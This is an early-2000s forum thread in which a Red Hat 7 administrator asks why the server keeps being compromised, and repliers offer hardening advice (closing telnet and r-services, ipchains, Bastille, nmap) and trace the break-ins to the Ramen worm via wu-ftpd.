cancel
Showing results for 
Search instead for 
Did you mean: 

Help with the hackers....

SOLVED
Go to solution
Shannon Petry
Honored Contributor

Help with the hackers....

I am having a world of trouble with RH linux and hackers.
It started about 3 weeks ago. I got hacked into. The system was immediately wiped, disk formatted, etc...
Well on Sunday, I was hacked again. Last time, I had NFS running, and found out the hard way there rpc.statd has many problems in linux. Also, I was allowing ICMP through my router. Since the first hack,
I have removed ICMP from router, removed all NFS, all NIS, etc....The only thing running was LPD, FTPD, HTTPD and telnetd. this is RH7. I also found at least weekly all patches for security and see what it got me?

Anyway, I am so used to SunOS and HP-UX being secure that I am really stumped as to how the dirtbags are getting in?????

Input from pros is greatly appreciated!

Regards,
Shannon
Microsoft. When do you want a virus today?
13 REPLIES
Mike McKinlay
Honored Contributor

Re: Help with the hackers....

Check out "The Newbies Area" hacking webpage at

http://www.thenewbiesarea.f2s.com/texts.html

Another location suggested EEPROM on a network card could be hacked to provide continued access even after a formatted drive and reinstalled OS ... if possible, yuck!
"Hope springs eternal."
Mike McKinlay
Honored Contributor

Re: Help with the hackers....

Shannon Petry
Honored Contributor

Re: Help with the hackers....

Unfortunaltly, this infor is pretty basic. As mentioned, I have looked at the rpc.statd program, and disabled it.

I also tested statdx against RH7 and could not get the root shell. I also tested some of the exploits I found for my version of wu-ftpd. Again, none of them work...

This is why I need some more advanced explenation of how the butt-plugs are getting in...


Shannon
Microsoft. When do you want a virus today?
AJ Hettema
Occasional Advisor

Re: Help with the hackers....

As far as I know all the big distro's have problems with security. They are not POSIX compliant and don't keep up with the FHS. That't the main reason. There's also the problem they try to make Linux open for users who don't know anything of UNIX operating systems. Try www.linuxfromscratch.org. This is a page which let you set up youre own Linuxbox, and in the end you'll know what youre box is doing and what software is running on it. It's also POSIX and FHS compliant.
Believe me! The secret of reaping the greatest fruitfullness and the greatest enjoyment of life is to live dangerously.
Mike McKinlay
Honored Contributor

Re: Help with the hackers....

Is there really a need to allow LPD and TELNETD ports open to the Internet? You don't mention SMTP ... what about that service?

If you're running a fairly simple website, you should only have 21, 80, and 443 (if you're using SSL) inbound open. Leaving telnet open to the Internet is just begging for people to try to force their way in.

I note the 6.x RedHat had a management plug-in called Pirahna that had a backdoor password implemented if you "install all" of the product. Would have thought that had been resolved with the 7.x release, but you never know.
"Hope springs eternal."

Re: Help with the hackers....


1. disable all services you dont need on :
/etc/rc.d/rc3.d , /etc/rc.d/rc5.d
/etc/inetd.conf

2. deny access to services you dont need from internet :
/etc/hosts.allow /etc/hosts.deny

3. see :
/etc/hosts.equiv /root/.rhosts

4. use ipchains to close all ports you dont need. Open only ports and protocols you REALY NEED.
Bill_6
Advisor

Re: Help with the hackers....

One of the quickest ways to secure the box would be to use Bastille on it, http://bastille-linux.sourceforge.net/ it's specifically designed to harden Red Hat installs.

The best way to help prevent problems is to find them first yourself, a few ways to do that are:

nmap http://www.insecure.org/nmap/
dsniff http://www.monkey.org/~dugsong/dsniff/
tcpdump http://ee.lbl.gov/

Unfortunatelly intrusion detection is as much an art as it is a science so there's really no quick way to learn it, regardless of what sales reps may tell you :-)

btw, their called crackers not hackers, there IS a difference.

HTH
There's nothing fdisk can't fix
Steve Whitaker
Occasional Visitor

Re: Help with the hackers....

A couple of clues may give you the reason for the hacks. The first thing I would check is roots .bash_history. This will show you what the hacker is doing, and will separate the experienced cracker from a script kiddie.

Also, make sure Anonymous FTP is turned off and/or the latest update for wu-ftpd is installed. For greater protection, you may want to invest in ProFTPD.

Install SSH and turn off telnet in inetd.conf...many telnet hacks out there.

Kill any r-anything BSD services. If you are on the Internet, you do not want these programs running.

Unfortunately, cheap bandwidth has made finding and cracking computers easier for kids who want to impress their friends by setting up IRC floods and DDoS attacks. make sure you run NMAP on the machine and only have httpd and ssh running to the outside. Anything else, you will need to procede with caution.

Good luck!

Steve
Albert E. Whale, CISSP
Honored Contributor

Re: Help with the hackers....

Shanon,

Just got hacked as well .... remove wuftp-2.6.0 from your server - this is the method of attack.

Hope that helps.
Sr. Systems Consultant @ ABS Computer Technology, Inc. http://www.abs-comptech.com/aewhale.html & http://www.ancegroup.com
Bill_6
Advisor

Re: Help with the hackers....

I'd be willing to bet these are all related to the Ramen worm, http://xforce.iss.net/alerts/advise71.php since wu-ftp is being mentioned. Now would be a good time to go to ProFTP, http://www.proftpd.net/ if the service is needed.

I'd also bet money that that we'll see other variations that aren't specifically targeting Red Hat systems in the near future.
There's nothing fdisk can't fix
Shannon Petry
Honored Contributor

Re: Help with the hackers....

Bill you hit the bullseye. I have not had much time to look at the hacked system, but RAMEN is definately the cause by the documentation.
Strange though that wu-ftpd was patched with the latest by Redhat, and rpc.statd was disabled....
I'll be looking at proftp and perhaps if that fails then just compiling from source wu-ftp.

Last question is how (since redhat does not notify) do I find out about these exploits before I am hacked?
This is twice I have had to dig at getting hacked and finding info in areas other than RH?

Thanks for most of your input!
Shannon
Microsoft. When do you want a virus today?
Bill_6
Advisor
Solution

Re: Help with the hackers....

Glad I could help Shannon. I don't use Red hat so I'm not familiar with how they do things in their distro. I do know that they try to be on the bleeding edge though, so that may account for some of the problems they have as far as security and stability are concerned. They also have a history of their x.0 releases having problems.

Unfortunately there isn't one all encompasing security site that I have found. I find that browsing the commercial/government sites as well as the "hacker" sites is about the best compromise. I also keep an eye on alt.os.linux.security since it's active 24/7 with people from around the world posting. Here's some of my main security bookmarks.

http://www.attrition.org/
http://www.sans.org/newlook/home.htm
http://securityportal.com/
http://www.securityfocus.com/
http://www.infowar.com/
http://www.cert.mil/
http://rootshell.com/beta/news.html
http://www.infosyssec.org/
http://xforce.iss.net/

There's nothing fdisk can't fix
Bill_6
Advisor

Re: Help with the hackers....

oh, I forgot http://www.linux-firewall-tools.com/linux/ as well.
There's nothing fdisk can't fix